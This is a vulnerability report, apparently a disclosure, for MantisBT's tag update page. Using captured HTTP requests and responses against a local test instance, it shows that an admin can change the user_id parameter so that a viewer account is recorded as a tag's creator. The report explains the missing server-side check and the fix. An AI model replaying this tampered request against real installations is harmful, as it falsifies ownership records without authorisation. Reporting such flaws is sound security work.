Steps To Reproduce
- Log in as your admin account
- Go to Manage > Manage Tags
- Select any tag
- Open the update page by clicking the "Update Tag" button
- Turn on interception in your proxy
- Submit the form and capture the request
Request
POST /mantisbt2/tag_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/tag_update_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_PROJECT_COOKIE=2; PHPSESSID=u3jfpkfngcgqmr3mgcfq2ip913; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=8%2C5
Upgrade-Insecure-Requests: 1
tag_id=2&tag_update_token=20200913ZSA8qpB9az4sp0UYftL8R-6tSHhobA9Z&name=xxx&user_id=1&description=Tag
Response
HTTP/1.1 302 Found
Date: Sun, 13 Sep 2020 04:16:16 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sun, 13 Sep 2020 04:16:16 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sun, 13 Sep 2020 04:16:16 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt2/tag_view_page.php?tag_id=2
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Attack scenario: send the same request again, but change the value of user_id to the id of a viewer account (in my case my viewer account id is 4). The tag_update_token is a per-form token, so take a fresh one from the update page before resending. Note that both requests carry a valid tag_update_token, so this is not a CSRF problem: the server validates the token but accepts whatever user_id the client sends, and answers the modified request exactly as it answers the legitimate one (302 to tag_view_page.php) without checking that the chosen user is allowed to be a tag creator. The fix belongs server-side in tag_update.php: the submitted user_id must be checked against the users actually permitted to own a tag rather than trusted from the form.
Exploit request
POST /mantisbt2/tag_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/tag_update_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_PROJECT_COOKIE=2; PHPSESSID=u3jfpkfngcgqmr3mgcfq2ip913; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=8%2C5
Upgrade-Insecure-Requests: 1
tag_id=2&tag_update_token=20200913mHy8SlN9pxvwdexRaAZRaZfclmY5ciQ-&name=xxx&user_id=4&description=Tag
Exploit response
HTTP/1.1 302 Found
Date: Sun, 13 Sep 2020 04:18:46 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sun, 13 Sep 2020 04:18:46 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sun, 13 Sep 2020 04:18:46 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt2/tag_view_page.php?tag_id=2
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
- Refresh the tag view page: the viewer account is now shown as the tag's creator